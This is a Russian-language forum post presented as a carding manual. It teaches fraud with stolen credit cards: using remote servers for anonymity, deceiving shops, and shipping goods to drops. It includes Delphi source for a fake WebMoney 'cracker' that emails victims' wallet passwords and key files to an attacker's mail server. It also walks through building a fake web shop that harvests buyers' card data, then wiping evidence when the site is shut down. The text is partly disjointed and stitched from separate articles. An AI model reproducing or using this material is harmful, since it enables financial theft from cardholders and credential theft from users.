• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Пособие по кардингу

AnonX0x0

HDD-drive
Пользователь
Регистрация
24.11.2019
Сообщения
30
Реакции
27
Основные заблуждения.

1. Хочу все и сразу.

Первая ошибка в том, что новичок хочет сразу заниматься заливами, купить себе СС и перегонять на свою карту, такого не бывает. С СС перевести деньги на другую СС технически невозможно, можно только списать средства с СС. Я всегда советую начинать с вещевухи, как искать шопы, вбивать и принимать стаф, здесь все есть. Также статейка по общим понятиям по заливам есть.

2. Безопасность. Меня посадят.

Одна из главных проблем новичка - это боязнь, что его посадят. Почему-то думает, что он сразу начнет зарабатывать миллионы и за ним непременно следят. Если ты скардишь даже пускай сотню товаров из шопа, то шанс, что за тобой придут, равен или почти равен нулю! И это самое главное, что нужно себе вбить. Когда ты вбиваешь в шоп с дедика, ты уже скрываешь свой реальный ip, причем используешь не сокс, а именно дедик, который имеет наибольшую анонимность.

Да, когда в месяц доходы будут больше 2,000$, то следует купить себе ВПН, ВПН - это те же дедики, но только соединенные один маршрутом, связка ip, т.е. реальное местоположение будет не реально вычислить, если, например, сервера для ВПНа находятся в Панаме или Шри-ланке, потому что власти этих стран по дефолту не будут раскрывать логи Интерполу.

3. Легкие деньги.

Возможно, ты уже знаешь, что все продавцы дампа+пина это все лохотрон. А если нет, то предупреждаю деньги за деньги никто не продает, чудеса возможны только в стране дураков.

Предисловение. Куда можно вбить и как на этом заработать.

1. Шопы. Плюсы: относительно легко найти шлющий шоп. Минусы: шопы быстро помирают, маленький % чистого дохода от вбива. Как искать шопы и как анонимно принимать стаф есть в материалах.

2. Свой мерчант счет. Плюсы: доход от вбива до 95%. Минусы: стартовый капитал на поднятие своего мерчанта, сложность найти мерчант с большим процентом допустимых чарджбеков или с мгновенным выводом. Как открыть свой мерчант счет есть в материалах.

3. Брокерские конторы, типа форекс и биржи. Вбивать СС смысла нет, но можно купить с логов такие аккуанты и открыть счет на дропа с таким, же именем и фамилией, как у холдера и слить все деньги на дропа.

4. Покер аккуанты и конторы со ставками на спорт. Можно конечно заниматься чипдампингом и придумывать свои цепочки, а можно пойти проще через небольшой обман. Тема по выводу есть в материалах.

5. Мобильные операторы. Скажу сразу, что в СНГ операторов вбить не получится, не спорю такие мерчи есть, но лимиты на пополнения колеблются около 10$, это просто того не стоит, чтобы тратить свое время.

6. Онлайн игры. На данный момент, вбив в СНГ игры умер напрочь, зарабатывать на этом не получится, деньги могут списаться с СС, но на счет игры не поступят, если придут, то быстро локнут аккуант. Так, что вбиваем только в пиндосовские игры или покупаем золото у поставщиков. Вбивается лучше с пайпел, нежели с СС. Если один будет вбивать, а другой выводить, то можно хорошо сработаться.

7. Платежные системы. Не стоит вбивать в пайпел, хотя бы, потому что цены на аккуанты доступны, также нет смысла вбивать в манибукерсы (скрил) эта платежка больше себя позиционирует для оплаты товаров и услуг, нежели для расчетов. А вот вбивать в алертпей смысл есть, достаточно принять смс, отправить 2 скана и можно вбивать.

8. Остальное. Это всевозможные лохотроны, ммм, соцсети, хостинг, реклама, порно и т.д. 1 правило вбить в СНГ сайты не получится, за исключением, если не прикручен пайпел, алертпей и им подобные.

Поздравляю тебя, ты сделал верный шаг на встречу к большим деньгам. Можно было полгода и более потратить на самообучение, ни один раз обжечься и начать зарабатывать деньги или вовсе разочароваться и бросить это дело. А можно прочесть эту статью до конца, осознать все и не просто хорошо зарабатывать, а начать косить бабло.

Когда человек далекий от кардинга, слышит слово «кардинг», ему в голову начинают приходить образы заливов, как он снимает деньги с буржуйских карточек и перегоняет на свои счета. Такого не бывает. Нельзя просто взять с одно СС на другую СС слить бабло. Можно с роллки (СС с онлайн банкингом) перевести деньги на СС (карту) дропа одной и той же страны. Цены на карты начинаются от 400$ и заканчиваются 5000$, а залить на них миллионы не получится, т.к. все упирается в лимиты.

Деньги с СС можно перевести на счет казино, покера, платежной системы и оттуда вывести, но это уже не будет называть заливом, это можно обозвать темой слива с СС. Так вот темы слива денег с СС никто просто так палить не будет. Есть паблик темы, о которых можно прочесть в следующих статьях, а есть приват темы, до которых нужно доходить самому. Да, темы продают, попадаются и достойные, разброс цен держится от 100$ до 3000$, во всяком случае, на глаза мне темки дороже не попадались. Только подвох в т.ч. купив тему, пускай даже через гаранта, тебе никто не даст гарантии, что тема не умрет на следующий день. Как правило темы слива живут в среднем месяц-два, далее или вовсе все накрывается, или будут вводится лимиты, дополнительные проверки, ограничения и т.п. В этом направлении можно работать и зарабатывать, но чтобы прям зарабатывать миллионы, не выйдет.

Забегая вперед, скажу, что миллионы крутятся только в банковских заливах. Кто в состоянии держать свои ботнеты, те в первую очередь выдергивают логи с банковскими аккуантами и сливают на своих дропов, а все то, что продают это шлак или небольшие балансы, или не хватает дополнительных кодов, танов, смс подтверждения, или банк не удобен для слива, долго идет транза, быстро лочат. Кстати говоря, поэтому и цены на СС столь низкие, СС идут вместе со всеми логами, деньги со счетов сливают не кислые, а СС продают сразу оптом, как дополнение к основному доходу.

Теперь спустимся на более реальную землю, заливы это хорошо, но нужен для старта капитал. А мы же хотели с нескольких десяток долларов зарабатывать на хлеб с солью, а лучше с икрой. Так вот. Есть такое волшебное место и это место вещевуха. Вбиваем стаф на дропа и получаем свой процентик. Один шоп, это по сути одна тема по сливу, если задрочить помрет также быстро. Только разница в том, что ежедневно новых шопов появляется в сотни раз больше, чем контор, которые принимают оплату. Шопов просто больше, их легче искать, не шлющий шоп без труда заменяется шлющим и так по кругу. Поиск шопа можно разделить на три этапа, первый, это отсев, подробнее можно прочить в статье ищем шоп, здесь основная задача это составить список потенциальных шлющих шопов, на втором этапе, саппортам всех этих шопов пишем легенду что я такой-то хочу отправить подарок такому-то в Россию, как мне это лучше сделать и в зависимости от тематики шопа выбираем от деда к сыну, от мужа к жене и т.д., на третьем этапе, уже по всем тем шопам, которые нам ответили положительно, пробуем вбить СС, вбиваем на небольшую сумму, дабы просто проверить шлет ли шоп вообще. Если придерживаться данной последовательности, отошлют стаф 9 из 10 шопов. Теперь посчитаем наши возможные доходы. Стафер получает в среднем 30% от цены в шопе товара. За час делается три вбива, за сутки 20, это мы берем не по верхней планке. 600$ - усредненная стоимость одного пака, если слать на дропов США или Европы, то сумма будет выше. И так. 600 умножаем на 20 вбивов и от этой суммы забираем свои 30% и получаем 3600$ дохода за одни сутки.

Слово «обналичка» вызывает разные ассоциации. У кардера с этим связано очень многое, в частности - дропы, платежные системы и, разумеется, большие деньги :).

Но в итоге все сводится к одному - извлечению из виртуальных карточек вполне реальных денег. Например, WebMoney. Конечно, готовых рецептов “cc > WM” я не дам. Таких просто не существует. Многих новичков обманывают именно таким способом, потому что любого человека, только пришедшего в кардинг, будет терзать мысль: «Как же мне поскорее обналичить
кредитную карту в WM и поиметь много $?»
Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3.

WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper.

Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц.

На hostonce практически не проверяют cc, и сайт никогда не закроют.


Вбив.

Скардить товар не намного сложнее, если покупать его за свои деньги. По сути скопировал данные сс, вставил в окошки и профит, ничего сложного, это так и есть, а теперь ближе к делу.

Что нужно для успешного вбива?

- Материал. СС и Дедик, дедик берем сразу под штат СС.

- Шоп. Шопы шлют ВСЕ, иначе интернет-магазинов просто бы не существовало. Отличие лишь в том, что к каждому нужен свой подход, одни не шлют в отдельные страны вовсе, другие не шлют на большие суммы, третьи не шлют, потому что сс без vbv кода и т.д.

По шагам.

1. Покупаем СС, лучше без vbv кода. На заметку: 1. Есть шопы, которые не просят vbv код, даже если СС с кодом. 2. Если вбивать электронику, то с вероятностью 98% без vbv кода вбить СС не прокатит, т.е. придется покупать только с vbv.

2. Покупаем дедик под штат СС.

3. Ищем шоп. Если есть шоп, пункт пропускаем. Хитрости поиска шопов есть в материалах.

4. Регистрируем почту. Регистрируем в зоне com, с абстрактным названием чтобы сошло для женщины и для мужчины, например, watercould98, likechokоlade и т.п.

5. Заходим на дедик.

6. Вбиваем. ну и все) Важный момент шипинг и билинг адресов. Здесь нужно экспериментировать или узнавать у саппорта шлет ли на отличный биллинг или нет. Есть шопы, в которых указываешь одинаковый билинг и шипинг адрес причем сразу дропа, данные сс не меняешь, т.е. идет соответствие адресов, но нет проверки адреса и холдера. Самые удобные шопы для вбива)

Чтобы шоп слал на одного дропа несколько раз можно менять местами имя и фамилию, делать 2-3 ошибки в имени, также указываем адрес соседа.

Любые проблемы лучше решать, написав сразу саппорту, что и почему не проходит оплата, они ответят и если повезет, за тебя сами проведут оплату.

Вещевой кардинг

Вещевой кардинг получил наибольшее распространение среди кардеров. Его суть заключается в заказе товаров в интернет-магазинах по чужим кредитным картам с целью последующего сбыта.

Схема работы вещевика, вроде бы, лежит на поверхности. Это привлекает многих начинающих кардеров, которым все кажется понятным и простым. На самом деле заниматься вещевым кардингом не так легко. Чтобы получать доход, нужна цепочка людей, которые будут слаженно работать.
ЗАКЛЮЧЕНИЕ- ПОНРАВИЛАСЬ СТАТЬЯ?ПРОДОЛЖАТЬ?!
 
Последнее редактирование модератором:
Кодинг

Настало время представить проект, реализующий «крякер» кошельков WebMoney. На самом деле, эта фейк-программа просто отсылает все ключи и пароль на мыло злоумышленника.

Для реализации задуманного потребуются следующие компоненты:

5 Label (текст, вкладка Standard), 5 Edit (вводимый текст, вкладка Standard), 3 Button (кнопка, вкладка Standard), Memo (Текстовое поле, вкладка Standard) и ProgressBar (вкладка Win32), а также компоненты NMSMTP(вкладка FastNet) и OpenDialog(вкладка Dialogs).

Назначаем caption кнопкам и текстовым полям.

Label1.Caption := 'WM (Webmoney Identificator)';

Label2.Caption := 'Кошелек (Пример: Z143365768493)';

Label3.Caption := 'Пароль WM';

Label4.Caption := 'Путь к файлу ключей';

Label5.Caption := 'Сумма для перевода';


затем кнопкам:

Button1.Caption := 'Обзор';

Button2.Caption := 'Генерировать';

Button3.Caption := 'Отмена';


Полю Memo ставим текст, тоже через переменные:

memo1.text := 'Примечание:'+#13#10+

'Размер файла ключей должен быть минимальным, т.к. программа изменяет его содержимое и закачивает на сервер.'+#13#10+

'Если размер будет более 1 мегабайта, то компания WebMoney заметит среди своих'+#13#10+

'ключей - твой, который имеет большой размер.';


События для нажатых кнопок:

// Обзор

procedure TForm1.Button1Click(Sender: TObject);

begin

// если диалог удачно запущен то

if opendialog1.Execute then

// записываем имя файла

Edit4.Text := opendialog1.FileName;

end;

// Генерировать

procedure TForm1.Button2Click(Sender: TObject);

begin

// ProgressBar1 - изменение положения ползунка прогресс-бара

ProgressBar1.Position:=0;

// Вложенные файлы

NMSMTP1.PostMessage.Attachments.Text := Edit4.text;

ProgressBar1.Position :=ProgressBar1.Position+10;

// Body отправляемого письма

NMSMTP1.PostMessage.Body.Text := 'WmCrack 9.1.2 PRO Message'+#13#10+

'Some lame use you programm...:)'+#13#10+

'WM ID: '+Edit1.text+#13#10+

'Z or E or R: '+Edit2.text+#13#10+

'Pass:): '+edit3.text+#13#10+

'File.kwm: '+Edit4.text+#13#10+

'Money: '+Edit5.text;

ProgressBar1.Position:=ProgressBar1.Position+10;

// Тема письма

NMSMTP1.PostMessage.Subject :='>>>WMCRACK*************';

ProgressBar1.Position:=ProgressBar1.Position+10;

// Имя программы, которая отправляла письмо

NMSMTP1.PostMessage.LocalProgram :='SomeShit';

ProgressBar1.Position:=ProgressBar1.Position+10;

// Reply-To адрес

NMSMTP1.PostMessage.ReplyTo :='fake@thecc.ru';

ProgressBar1.Position:=ProgressBar1.Position+10;

// Почта отправителя

NMSMTP1.PostMessage.FromAddress :='fake@thecc.ru';

ProgressBar1.Position:=ProgressBar1.Position+10;

// Имя отправителя

NMSMTP1.PostMessage.FromName :=':WMCrack:';

ProgressBar1.Position:=ProgressBar1.Position+10;

// E-mail хакера

NMSMTP1.PostMessage.ToAddress.text :='yourmail@i-have.cc';

ProgressBar1.Position:=ProgressBar1.Position+10;

// SMTP сервер хакера

NMSMTP1.Host := 'i-have.cc';

ProgressBar1.Position:=ProgressBar1.Position+10;

// Отсылка письма

NMSMTP1.SendMail;

ProgressBar1.Position:=100;

// Сообщение об удачной отправке денег жертве

Showmessage('Обновите свой WM Keeper, сумма должна придти в течение 1-2 минут.');

end;

// Отмена

procedure TForm1.Button3Click(Sender: TObject);

begin

NMSMTP1.Abort;

// Прогресс-бар ставим на 0

ProgressBar1.Position :=0;

end;


Обзор сниферов

Как я уже говорил, в инете полно сниферов. На первый взгляд разобраться в них не так-то просто, поэтому публикую небольшой обзор программ-нюхачей.

Sniffit. Один из первых сниферов, который по-прежнему является очень популярным. Он сохраняет первые 400 байтов пакета по умолчанию, но хакер может настроить его так, чтобы он перехватывал пароль жертвы.

TCPdump. Знаменитый снифер. Считается профессиональным административным средством.

ADMsniff. Известная, очень квалифицированная группа хакеров ADM написала отличный снифер. Определенно советую посмотреть, т.к. все, что они делают, стоит внимания.

Linsniffer. Популярный снифер, разработанный для платформ Linux.

Sunsniff. Этот снифер выполнен под платформу SunOS. Возможно, один из самых известных сниферов, сделанный почти десять лет назад.

Поломали?

Если ты оказался в лапах хакера, то, возможно, у тебя бреши в операционке. Обязательно читай bugtraq и вовремя накладывай патчи на свою систему. Взять их можно на www.microsoft.com/.

Способов украсть ценную информацию и сбережения кардера очень много.

Я не буду тебя учить эксплуатировать уязвимость. Об этом писали различные хакерские порталы, а также Хакер #9. Я лишь заострю твое внимание на командах, которые могут пригодиться взломщику, захватившему права на системе жертвы.

В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой "type file".

Если хакер взламывает подобный ресурс, он просто заменяет в исходном коде скрипта ссылку и параметры на свой кошелек WebMoney.

Следует помнить, что для выполнения SSI-вставок, файлу необходимо дать расширение shtml.

Эффективным способом хищения информации является снифинг данных. Снифер - программа, которая перехватывает весь трафик на определенных интерфейсах и отбирает из него инфу, которая указана в конфе снифака.

Еще одним интересным способом взлома является брутфорсинг (перебор) паролей на определенный сервис. Я слышал о таких приватных проектах, как переборщик https-аккаунтов.


Личный псевдосайт кардера

Некоторые личности ничего не делают и... получают реальные доходы. Без начального капитала, с абсолютного нуля. И повторить их опыт может каждый, даже ты. Для этого нужно желание, удача и чуть-чуть терпения. Я расскажу тебе о прибыльном бизнесе, построенном на псевдосайтах.

Что такое псевдосайты

Псевдосайт - это не что иное, как умело сделанный ресурс, который имеет автоматизированную систему оплаты по кредитным картам. Но в отличие от проектов, которые исправно высылают товар после оплаты, псевдоресурс совершенно негуманно динамит покупателя, помещая данные о кредитке в отдельную базу. При серьезном подходе к делу, псевдосайт может приносить кардеру умопомрачительные доходы. Все потому, что интернет-магазины (либо порногалереи) пользуются большой популярностью среди тупых, но богатых буржуев, для которых онлайновые покупки - норма жизни.

Что нам стоит сайт построить

Чтобы построить псевдосайт, необходимо найти для него программное обеспечение - движок. Он состоит из отдельных html-страниц (формы для оплаты) и скриптов, которые обрабатывают вводимую информацию. Авторы движков используют два способа для хранения полученных данных:

Через базу данных (БД). Этот способ избавляет от многих проблем, с которыми может столкнуться пользователь движка, для успешной работы достаточно создать базу и пару таблиц. Затем скрипты сами будут обращаться к БД и запрашивать/сохранять данные.

Посредством файлов. Все бесплатные движки распространяются именно с таким алгоритмом. Здесь тебе придется попотеть, изменяя дефолтовые значения путей в конфигах сценариев. Нельзя забывать и о правах доступа к файлам, в которые будет записываться информация (проставляются вручную).

На фриварных источниках валяется неплохой движок dcshop (http://kamensk.net.ru/forb/1/x/id1608.zip). Он организует универсальный интернет-магазин по продаже всякого хлама. Умеет авторизовывать после оплаты по кредитке и комплектуется скриптом для администрирования товаров.

Удобно, что dcshop работает как под UNIX, так и под NT платформы. В довесок к этому он снабжается подробным мануалом и кучей дефолтовых конфигов.

Для того чтобы магазин функционировал, от хостинга требуется:

доступ к FTP-серверу;

WWW-сервер с поддержкой cgi-сценариев;

желательна поддержка собственных .htaccess-файлов;

желателен доступ по SSH, что позволит без особых проблем установить и изменить настройки dcshop прямо с шелла.

Первые два пункта, которые необходимы, удовлетворяют практически все бесплатные хостинги, поэтому регистрируйся на буржуйском ресурсе (проще отмазаться потом) и приступай к установке онлайн-магазина. При желании смотри работу проекта в онлайне по адресу http://kamensk.net.ru/forb/cgi-bin/shop/dcshop.cgi.

Хотя dcshop для хранения не использует БД (пишет в отдельные файлы), он как раз подойдет, так как не каждый халявный хостинг предоставляет доступ к БД (но бывают приятные исключения, например, www.spaceports.com).

Доставка и установка

Движок состоит из трех скриптов: магазин с поддержкой корзины, админ-зона и сценарий для запроса инфы о кредитной карте. К каждому скрипту есть свой конфигурационный файл.

Сперва настрой конфиг .setup, в нем необходимо изменить несколько значений переменных и пути к директориям. Главной переменной в конфиге является $cgidir, она указывает на директорию cgi-bin, в которой будет располагаться большинство скриптов движка. Лучше всего создать подпапку в каталоге со скриптами и определить в ней сценарии магазина. К примеру, значение $cgidir может быть "/home/carder/web/cgi-bin/eshop".

Далее идут пути, которые зависят от $cgidir. Лучше их не менять, чтобы не было путаницы при закачивании файлов на сервер. Следующая за ними переменная $order_database ведет к самому интересному файлу, ради которого мы и устанавливаем проект dcshop. Это база кредитных карт, точнее, в этот документ будет сваливаться вся информация о буржуйских кредах. Дефолтовое значение переменной - "orders.txt", и находится этот файл по пути, прописанному в переменной $order_dir. Рекомендую менять пути на более сложные, иначе база будет доступна через веб.

Переменная $templatefile отвечает за главный html-файл, который будет подгружаться после исполнения скрипта dcshop.cgi. В этот файл ты можешь поставить свой копирайт, либо убедить буржуя в законности твоей коммерческой деятельности ;).

Затем укажи путь к бинарнику sendmail. Обычно он располагается в директории /usr/sbin, в противном случае местоположение будет оговорено администрацией хостинга. Переменная задается для того, чтобы после успешного заказа клиент получил письмо о принятии платежа. Заодно поменяй адрес smtp-сервера, мыло, с которого будет отправлено письмо, а также его тему (например, smtp.spaceports.com).

В следующей секции конфига задаются абсолютные пути к сайту. Допустим, тебе дали домен shop.hosting.net. Исходя из этого, поменяй переменные $cgiurl и $mainurl на значения к директориям с html и cgi-bin соответственно, к примеру, http://shop.hosting.net/cgi-bin/eshop. Там же укажи путь к картинкам (они будут располагаться в директории для html-файлов).

Проект подразумевает наличие https-сервера, но я сильно сомневаюсь, что фриварный хостинг предлагает https. Если твой - не исключение из правил, то значения $secureurl и $secureimgurl делай равными $cgiurl и $mainurl. В конце секции укажи e-mail администратора проекта.

На этом, собственно, дефолтовая настройка заканчивается. Дополнительно можно (настоятельно советую) переопределить пути к дефолтовым скриптам. Тогда в случае обнаружения баги в проекте dcshop, твой ресурс не взломают (не зная новые пути). Итак, меняй значения $dcscript, $checkout_script и $adminscript. Открой скрипт dcshop.cgi и измени путь к конфигу в строке require. И переименуй конфиг. Если возникнут проблемы, про это есть и в FAQ’е проекта, и в файле readme.

Оттачиваем остальные скрипты

Помимо главного конфига, есть setup-файлы для скриптов checkout и admin. В конфиге для checkout измени дефолтовые темплейты html на что-нибудь более красивое (лично мне не понравилось слово "demo" в тексте). А в dcshop_admin.setup тебе придется поменять путь к директории, в которой хранится пароль администратора. Рекомендую закрыть доступ к директории с указанным файлом (для чего и нужна поддержка собственных .htaccess-файлов), потому что знающий чел сможет увидеть содержимое каталога, а следовательно, и файла с паролем.

Правильная транспортировка

Настало время для переноса файлов на FTP-сервер. Сперва создай директорию для html-файлов, а также вложенный каталог Images (обрати внимание на регистр). Затем перелей все дефолтовые изображения в эту папку. Зайди в cgi-bin/eshop, в эту директорию залей все конфиги и скрипты. Нюанс - заливать надо в ASCII-режиме, иначе скрипты не будут работать. Осталась самая малость - поставь на все каталоги права 777, а на файлы .pl и .cgi - 755.

Самое время затестить результат. Обратись к главному скрипту магазина dcshop.cgi. Если все верно, то магазин будет функционировать без всяких побочных выкидонов. Если выдаст ошибку 500, узнай причину, по которой сценарий не работает. Для этого создай файл .htaccess в корне WWW со следующим содержанием:

<Directory "/path/to/www">

ErrorLog "/path/to/www/error.log"

</Directory>

После этого еще раз обратись к скрипту и читай содержимое лога в html-директории. Возможно, ты просто забыл залить какой-нибудь файл либо изменить дефолтовый путь.

Теперь займись админским скриптом. Чтобы никто тебя не поимел либо не спер большую базу новых кредиток, зайди в админ-зону и зарегистрируйся под новым юзером с правами администратора. После этого топай по линку "Change Configuration Setting" и запрети регистрацию новых юзеров. Рули на здоровье своим онлайн-магазином.

Имеет смысл создать отдельную директорию для админ-зоны и закрыть ее дополнительной авторизацией (от греха подальше). Это легко делается с помощью стандартных средств Apache. Вначале необходимо создать .htaccess файл в каталоге с админ-скриптом. В нем пиши следующее:

AuthType Basic

AuthName "Admin zone"

AuthUserFile "/path/to/.htpasswd"

Require valid-user

Затем создай .htpasswd, в котором записывается аккаунт в виде пары login:password. Допустимые алгоритмы шифрования пароля: DES, MD5, SHA, а также Plain text. Кодировать пароли умеет утилита htpasswd, входящая в поставку Apache. Алгоритм MD5 поддерживается всеми версиями web-сервера и наиболее надежный. Ставится пароль командой htpasswd -bcm .htpasswd admin myp4ssw0rd, опция -bcm означает запись MD5-пароля в новый .htpasswd.

Права на .htaccess и .htpasswd установи равными 600. Это позволит только тебе изменять их, у других бродяг не будет доступа к этим важным файлам.

Строим бизнес

Теперь необходимо изменить дефолтовые товары. Если с фантазией у тебя все в порядке, ты запросто придумаешь товары, которые захотят купить богатые и тупые иностранцы. Но прежде необходимо разобраться со структурой базы товаров.

В файле с товаром (неважно каким) можно задать несколько параметров. Это идентификатор (ID), категория (Category), название продукта (Name), изображение (Image), описание(Description), цена (Price) и налог с продаж (Taxable). Дополнительно есть свои опциональные параметры, например, цвет и стиль. О них читай в файле readme.txt. Забиваешь данные, а они автоматом помещаются в папку Data относительно каталога cgi-bin/.

В этом же каталоге хранится установочный скрипт с краткой информацией о данной категории товаров. Удобно, что движок включает четыре готовых образца. Таким образом, просто сделай аналогичный темплейт для категории товара и вперед.

База все-таки лучше

Написать свой движок с поддержкой БД не так уж и сложно. Необходимо знать принципы обмена между клиентом (скриптом проекта) и сервером (БД mySQL), к которому у тебя будет доступ. При этом не обязательно писать отдельный движок, достаточно внести некоторые изменения в код dcshop и научить его обращаться с БД.

С помощью специального модуля DBI.pm можно работать с mySQL (именно такая БД рулит на большинстве хостингов). Тебе потребуются три вещи: умение коннектиться к базе, вставлять и изменять в ней данные, а также считывать инфу из нужных таблиц в БД. Чтобы переделать файловый движок, необходимо всего лишь заменить обращение к файлу запросом к базе. Фрагменты кода, реализующие грамотную работу с mySQL (код снабжен подробными комментариями), скачивай по адресу http://kamensk.net.ru/forb/1/x/mysql-code.

Закон есть закон

Когда-нибудь твой ресурс будет закрыт. Это произойдет, скорее всего, после того, как в службу поддержки хостинга поступит жалоба от очередного надутого клиента. Поэтому тебе не помешают несколько полезных советов, чтобы последствия закрытия проекта не отразились на твоем здоровье:

1. При организации мини-порногалереи никто не будет требовать с тебя какой-либо ответственности, если ты сделаешь стартовую страницу с предупреждением о совершеннолетии клиента.

2. Если дела пошли в гору, зарегистрируй себе домен второго уровня и заведи нормального хостера. Когда твой ресурс удалят, ты можешь легко изменить dns-зоны своего домена при переезде на другой хостинг.

3. Постарайся оставлять как можно меньше данных о себе на страницах ресурса. Лучше скажи, что ты какой-нибудь богатый китаец, продающий ручки Паркер, чем бедный русский студент ;).

4. При переезде тебе придется столкнуться с такой проблемой, как бэкап всех данных. Это необходимо сделать вовремя, когда почувствуешь, что дело пахнет керосином. Если с файлами проблем не возникает, умело забэкапить базу - дело тонкое (хотя и несложное). Для этого потребуется помощь небольшой утилиты mysqldump, которая входит в поставку mysqlclient. Заходишь на шелл своего хостинга и набираешь команду:

$ mysqldump -u client -pclientpassword eshop > eshop.sql

Соответственно, аккаунт к базе должен иметь вид client:clientpassword, а база называться eshop. Бинарник сформирует структуру таблицы, которая должна быть заархивирована и транспортирована на другой хостинг. Сжимать лучше архиватором bzip:

$ tar jcf eshop.tar.bz2 eshop.sql

На новом хостинге необходимо его распаковать и создать копию структуры базы (по файлу eshop.sql). При этом не нужно заботиться о создании таблиц и БД, все сделает mysqldump:

$ tar jxf eshop.tar.bz2

$ mysql -u client -pclientpassword < eshop.sql

С помощью переопределения ввода ты позволяешь бинарнику mysql получить команды прямо из файла. В нашем случае из бэкапа eshop.sql.

5. Чтобы выйти сухим из воды, удали все файлы со старого хостинга (разумеется, после бэкапа) и дропни базу данных. Это можно сделать командой "drop database eshop;" в клиенте mysql.

Теперь ты кардер

Вот и все. Псевдобизнес - очень прибыльное дело, потому что все заработанные кредитки уходят только тебе. В день такой ресурс могут посетить десятки, а то и сотни богатых буржуев (зависит от раскрутки). Но в организации подобных проектов существует определенная доля риска, иначе все понаделали бы онлайн-магазинов и жили за счет буржуев. Поэтому, если ты прилично зарабатываешь, и решил создать псевдосайт только из любопытства, поразмысли на досуге, стоит ли тебе тратить свои нервы и деньги на противозаконную деятельность...

Раскрутка ресурса

Сделать псевдосайт - полдела, необходимо его еще и раскрутить. В противном случае твой ресурс запылится и не принесет никакой пользы. Для привлечения посетителей, конечно, все средства хороши, но не все эффективны. По-хорошему, если ты планируешь заколачивать на ресурсе приличные бабки, придется сначала потратиться на раскрутку.

Прежде всего, учитывай, что твоя основная аудитория - иностранцы. Следовательно, реклама рассчитана на них. Скорее всего, сам ресурс придется сделать на английском языке, либо на русском и английском одновременно. Далее регистрируешь ресурс на поисковых серверах, при этом тебя интересуют как наши поисковики, так и забугорные. Никогда не заморачивайся с поиском полного списка поисковых серверов, достаточно знать один крупный (к примеру, www.yandex.ru или www.rambler.ru), а остальные находишь непосредственно через него.

Часто эффективно проходит фокус с перенаправлением трафика с других порноресурсов. То есть создается порносервер, раскручивается в одиночку, а потом при помощи этого сервера раскручивают любые другие. Как именно это сделать - дело техники: перенаправлять часть заходов, подгружать параллельно или использовать ссылки-ловушки. При этом на раскручиваемом ресурсе ставятся счетчики рейтинговых систем, и он взлетает до небес. А там уже как лавина. Далее раскрученный ресурс, в свою очередь, можно использовать для раскрутки последующего.

Некоторые умельцы специально заводят ресурсы, чтобы предлагать другим раскрутку за деньги. Ты же можешь найти подобные ресурсы на условиях взаимораскрутки. То есть на первых порах они раскручивают тебя, а в будущем вы будете обмениваться трафиком, взаимно увеличивая количество реальных посещений на своих сайтах.

Другой эффективный способ привлечения потенциальных покупателей на свой псевдоресурс - баннерная реклама. При этом не обязательно выставлять код баннерной системы, можно выкупить показы на вторичном рынке, что порой очень выгодно. Вторичный рынок баннерных показов - по сути трафикогенерящие ресурсы, зарегистрированные в баннерных сетях. Часть показов они тратят на собственную раскрутку, а часть продают на так называемом вторичном рынке баннерных показов. Есть еще вариант продавать показы непосредственно баннерной сети, но цены будут ниже, плюс не все баннерные сети выкупают свои показы, либо выкупают только на определенных (чаще всего невыгодных) условиях.

Для покупки баннерных показов на вторичном рынке тебе понадобится баннерная биржа, на которой ты сможешь определиться с ценами (средние по бирже) на те или иные баннерные сети и форматы баннеров, плюс выкупить необходимые показы, если они есть в наличии. Одна из популярных баннерных бирж - www.banstock.com. Там тебе и FAQ, и статистика по наиболее популярным (читай - пользующимся спросом) баннерным сетям и форматам, а когда-нибудь ты сможешь и сам продавать через нее баннерные показы другим начинающим ресурсам :).

Хороший хостинг

www.h1.ru - российский бесплатный хостинг, баннер хостера обязателен, PHP/CGI/mySQL/SSH, могут отключить за нарушение регламента

www.rcdom.ru - PHP/CGI/mySQL

www.webservis.ru - PHP/CGI, баннер хостера обязателен

www.fatal.ru - PHP/CGI

www.spaceports.com - PHP/CGI/mySQL, баннер на сайте необязателен

www.webhosting.bootbox.net - PHP/CGI, без рекламы

www.come.to - PHP/CGI, баннер хостера обязателен

www.dot.tk - PHP/CGI, бесплатный домен второго уровня в зоне .tk

www.cgi.ru - обширный каталог PHP/CGI-скриптов (как бесплатных, так и коммерческих), именно оттуда был скачан описываемый проект dcshop

4wm.virtualave.net - большая коллекция CGI/C/C++ скриптов, все проекты в основном бесплатные

getscripts.vov.ru - ресурс, посвященный CGI-скриптам

www.cgi.agava.ru - русские CGI/PHP-скрипты в ассортименте

Бесплатный движок

При серьезном подходе к делу, псевдосайт может приносить кардеру умопомрачительные доходы.

Чтобы построить псевдосайт, необходимо найти для него программное обеспечение - движок. Он состоит из отдельных html-страниц (формы для оплаты) и скриптов, которые обрабатывают вводимую информацию.

На фриварных источниках валяется неплохой движок dcshop (http://kamensk.net.ru/forb/1/x/id1608.zip). Он организовывает универсальный интернет-магазин по продаже всякого хлама.

Рекомендую закрыть доступ к директории с указанным файлом (для чего и нужна поддержка собственных .htaccess-файлов), потому что знающий чел сможет увидеть содержимое каталога, а следовательно, и файла с паролем.

Нюанс - заливать надо в ASCII-режиме, иначе скрипты не будут работать. Осталась самая малость - поставь на все каталоги права 777, а на файлы .pl и .cgi - 755.

Затем создай .htpasswd, в котором записывается аккаунт в виде пары login:password. Допустимые алгоритмы шифрования пароля: DES, MD5, SHA, а также Plain text. Кодировать пароли умеет утилита htpasswd, входящая в поставку Apache.

При переезде тебе придется столкнуться с такой проблемой, как бэкап всех данных. Это необходимо сделать вовремя, когда почувствуешь, что дело пахнет керосином.

Если ты прилично зарабатываешь, и решил создать псевдосайт только из любопытства, поразмысли на досуге, стоит ли тебе тратить свои нервы и деньги на противозаконную деятельность.


1.Автоматически находить множество прокси

(для этого есть такая прога называется Proxy Switcher! Скачать ее можно тут

http://rutracker.org/forum/viewtopic.php?t=3516193

выполняет полностью все функции заялвенные космосом)

2.Сканировать интернет на наличие скрытых прокси

эту же функцию выполняет эта же прога Proxy Switcher!

3.Находить на дедиках ценные материалы, и суметь защищать свои

